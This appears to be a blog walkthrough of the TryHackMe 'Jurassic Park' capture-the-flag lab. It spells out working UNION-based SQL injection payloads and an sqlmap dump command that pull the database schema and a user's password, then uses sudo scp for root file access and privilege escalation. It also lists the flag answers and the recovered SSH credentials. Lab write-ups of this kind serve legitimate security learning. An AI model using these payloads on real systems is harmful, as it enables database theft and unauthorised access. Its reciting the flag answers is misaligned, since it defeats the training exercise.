thm-jurassicpark-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play  Tryhackme’s Jurassicpark at

This medium-hard task will require you to enumerate the web application, get credentials to the server and find 5 flags hidden around the file system. Oh, Dennis Nedry has helped us to secure the app too…

You’re also going to want to turn up your devices volume (firefox is recommended). So, deploy the VM and get hacking..

Please connect to our network before deploying the machine.


#1 What is the SQL database called which is serving the shop information?
#2 How many columns does the table have?
#3 Whats the system version?
ubuntu 16.04
┌─[user@parrot-virtual]─[~] └──╼ $curl 'http://10.10.28.121/item.php?id=5%20union%20select%201,version(),3,4,5'
#4 What is dennis’ password?
┌─[user@parrot-virtual]─[~]
└──╼ $curl http://10.10.28.121/item.php?id=5%20union%20select%201,password,3,4,5%20FROM%20users
#5 Locate and get the first flag contents.

b89f2d69c56b9981ac92dd267f

#6 Whats the contents of the second flag?
96ccd6b429be8c9a4b501c7a0b117b0a
#7 Whats the contents of the third flag?
b4973bbc9053807856ec815db25fb3f1
#8 There is no fourth flag.
#9 Whats the contents of the fifth flag?
2a7074e491fcacc7eeba97808dc5e2ec

We will start with a version scan with script of the top ports on the site:

Image for post

We have a ssh port open on port 22 and an Apache web service open on port 80.

Image for post

Lets navigate to the online shop:

Image for post

Here we can purchase a package, I will select the bronze package:

Image for post

The first thing to notice here is the address block which gives this page an ?id=2.

Image for post

From the tags relating to this box we know it involved SQLi or SQL injection. I am going to cycle through and change the ?id= from 0 to 5 and see what other pages it brings up.

?id=0 — No results found

?id=1 — Gold package

?id=2 — Bronze package

?id=3 — Basic package

?id=4 — No results found

?id=5 — Development package (Interesting)

Image for post

We have a user named Dennis. There is also a note saying that we cannot use certain characters, obviously the ‘ character is used in SQLi.

Let’s try and break the SQL using ?id=5‘ or 1=1

Image for post

So we are being blocked from using the ‘ character. This is why my initial trials using SQLMap did not work. So let try another special character that is not blocked ‘*’.

Image for post

As you can see, appending ?id=5* causes an error in the SQL, so it is fair to say that that the developer has been lazy with their code and this is vulnerable to a SQLi attack.

Lets first try to find out how many columns are in the database and see if we can perform a union exploit.

To do this we use the ‘order by’ statement and increase the number of columns until we get an error. So ?id=5 order by 1,2,3…..

Image for post

So our database has 5 columns, knowing this information we can use the union command to exploit the database and retrieve information, but first we need to see whether any of the columns are vulnerable, that is where the union command comes in, ?id=5 union all select 1,2,3….

Image for post

By adding 01,02,03,04 and 05 to the column numbers I can see those which are vulnerable. As some of the columns such as price prefix with a $ sign, we can use column 2,4 and 5 to pull information from the database. Column 1 does not appear on the website, so we cannot use that one either.

We need to find the database version, database name and we already know the number of columns.

Image for post

the database name is and the version is 

To pull the tables from the database we can use the following:

?id=1 union select 1,2,3 ,group_concat(table_name),5 from information_schema.tables where table_schema = database()

Image for post

We can see that we have two tables and 

Lets see if we can pull the columns relating the the table ‘users’. To do this we can use the following:

?id=1 union select 1,2,3, group_concat(column_name),5 from information_schema.columns where table_schema = database() and table_name = “users”

Image for post

In the table ‘users’ we have the following columns – and 

Normally I would extend this further and pull all the usernames and passwords from the database; however, remember the webpage when ?id=5.

Image for post

The ‘username’ has been blocked; however, we can at least retrieve the password. We can extract the password using:

?id=5 union select 1,2,3,password,5 from users

Image for post

Although we cannot retrieve to username, we can assume that the username is Dennis and a password: ih8dinos. Hopefully these are the ssh credentials for port 22.

┌─[user@parrot-virtual]─[~]
└──╼ $curl 'http://10.10.28.121/item.php?id=5%20union%20select%201,version(),3,4,5'
<link rel="icon" type="image/png" href="assets/favicon.png"/>

<!DOCTYPE html>
<html lang="en">
<head>
<title>Buy, Buy, Buy</title>--snip--


<h1>5.7.25-0ubuntu0.16.04.2 Package</h1></br>
</section>
<div class="container text-center">
<h3>Price: $3</h3></br>
<div class="alert alert-primary" role="alert"><b>5</b> of these packages have been sold in the last hour.</div></br>
<h4>4</h4>
</br><h4>Order yours quick by calling us!</h4>

</div>
</body>
</html>
┌─[user@parrot-virtual]─[~]

Or we simply use sqlmap to do all the work !

┌─[user@parrot-virtual]─[~]
 └──╼ $sqlmap -r http://10.10.114.167/item.php?id=1 --batch --dump --threads 10 --batch

-> dennis / ih8dinos

Image for post

We are in, exploring the home directory for Dennis we find flag1.txt

Image for post

We can also read the .bash_history.

Image for post

In the .bash_history we can see the third flag. Also there is a lot of data regarding scp which is being run as sudo. Scp is a file transfer system for transferring file between computers using ssh. We can also see that flag5 is in the /root directory.

Lets check out if Dennis has any Sudo privileges:

Image for post

We can see that Dennis has full root privilege to run scp, which now explains the .bash_history.

Moving back to /home to see what other users we have. There is one called ubuntu which we cd into.

Image for post

There is an interesting file that stands out, which belongs to root called .viminfo which is also hidden. Although this is owned by root, we have full sudo privileges to copy this file to our local machine using scp.

You should have the ssh server already installed on Kali; however, you can check this with the following:

As I do not use ssh that much, I use ssh.socket, start the ssh server with the following:

# systemctl start ssh.socket

If you want a great guid for setting up the ssh server, check out the link below

How to Enable and Start SSH on Kali Linux – LMG Security

Here at LMG Security , we’re passionate about providing excellent cybersecurity services to organizations around the…

www.lmgsecurity.com

Anyway back to downloading the interesting .viminfo file to our local machine using scp.

Image for post

Back on our local machine we can cat the .viminfo file, which gives us some very interesting information.

Image for post

As you can see, we have the location of flagTwo, which can be found in /boot/grub/fonts.

We can cat this file and retrieve the second flag:

Image for post

We know there is no flag4 and we know that flag5 is in the /root directory.

Again we can use the sudo rights for scp to transfer flag5 to our local machine.

Image for post

There is another option that can be employed instead of transferring the files to the local machine using scp. Basically the binary scp is vulnerable and as it is owned by root, we can exploit this to escalate our privileges to root.

The go to resource for exploitable common binaries is GTFOBins:

GTFOBins

GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions…

gtfobins.github.io

A quick search on GTFOBins for scp with sudo rights gives us the following exploit:

Image for post

Lets enter this code as user Dennis and see what happens:

Image for post

How awesome is that, a few lines of code and full root access.

Author : Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *